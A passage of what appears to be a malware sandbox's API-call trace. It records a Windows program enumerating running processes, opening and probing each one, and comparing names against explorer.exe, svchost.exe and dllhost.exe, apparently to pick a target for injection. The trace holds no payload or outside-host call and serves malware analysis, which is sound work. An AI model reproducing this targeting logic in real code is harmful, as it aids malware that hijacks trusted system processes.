th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0205.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0205.822] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.822] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.822] CloseHandle (hObject=0xec) returned 1 [0205.822] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0205.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0205.822] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0205.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0205.823] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.823] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.823] CloseHandle (hObject=0xec) returned 1 [0205.823] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0205.823] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0205.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0205.824] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0205.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0205.824] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.824] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.824] CloseHandle (hObject=0xec) returned 1 [0205.825] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0205.825] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0205.825] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0205.825] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0205.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0205.825] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.825] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.825] CloseHandle (hObject=0xec) returned 1 [0205.825] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0205.825] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0205.825] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0205.825] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0205.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0205.826] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.826] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.826] CloseHandle (hObject=0xec) returned 1 [0205.826] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0205.826] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0205.826] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0205.826] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0205.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0205.826] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.826] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.827] CloseHandle (hObject=0xec) returned 1 [0205.827] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0205.827] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0205.827] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0205.827] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0205.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0205.827] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.827] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.827] CloseHandle (hObject=0xec) returned 1 [0205.827] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0205.827] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0205.827] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0205.827] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0205.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0205.828] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.828] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.828] CloseHandle (hObject=0xec) returned 1 [0205.828] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0205.828] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0205.828] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0205.828] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0205.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0205.828] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.829] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.829] CloseHandle (hObject=0xec) returned 1 [0205.829] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0205.829] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0205.829] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0205.829] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0205.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0205.829] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.829] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.829] CloseHandle (hObject=0xec) returned 1 [0205.829] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0205.829] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0205.829] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0205.829] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0205.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0205.830] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.830] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.830] CloseHandle (hObject=0xec) returned 1 [0205.830] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0205.830] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0205.830] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0205.830] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0205.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0205.830] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.830] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.831] CloseHandle (hObject=0xec) returned 1 [0205.831] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0205.831] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0205.831] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0205.831] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0205.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0205.831] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.831] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.831] CloseHandle (hObject=0xec) returned 1 [0205.831] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0205.831] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0205.831] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0205.831] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0205.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0205.832] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.832] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.832] CloseHandle (hObject=0xec) returned 1 [0205.832] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0205.832] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0205.832] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0205.832] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0205.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0205.833] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.833] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.833] CloseHandle (hObject=0xec) returned 1 [0205.833] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0205.833] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0205.833] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0205.833] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0205.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0205.833] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.833] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.833] CloseHandle (hObject=0xec) returned 1 [0205.833] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0205.833] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0205.833] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0205.833] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0205.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0205.834] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.834] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.834] CloseHandle (hObject=0xec) returned 1 [0205.834] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0205.834] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0205.834] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0205.834] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0205.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0205.835] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.835] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.835] CloseHandle (hObject=0xec) returned 1 [0205.835] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0205.835] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0205.835] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0205.835] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0205.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0205.836] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.836] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.836] CloseHandle (hObject=0xec) returned 1 [0205.836] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0205.836] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0205.836] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0205.836] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0205.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0205.836] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.836] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.836] CloseHandle (hObject=0xec) returned 1 [0205.837] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0205.837] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0205.837] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0205.837] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0205.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0205.837] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.837] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.837] CloseHandle (hObject=0xec) returned 1 [0205.837] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0205.837] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0205.837] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0205.837] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0205.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0205.838] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.838] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.838] CloseHandle (hObject=0xec) returned 1 [0205.838] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0205.838] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0205.838] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0205.838] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0205.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0205.838] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.839] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.839] CloseHandle (hObject=0xec) returned 1 [0205.839] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0205.839] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0205.839] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0205.839] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0205.839] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0205.840] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0205.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0205.840] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0205.841] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0205.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0205.841] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0205.842] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0205.842] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.842] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.842] CloseHandle (hObject=0xec) returned 1 [0205.842] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0205.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0205.843] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.843] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0205.843] CloseHandle (hObject=0xec) returned 1 [0205.843] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0205.843] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.844] OpenProcess (dwDesiredAccess=0x400, 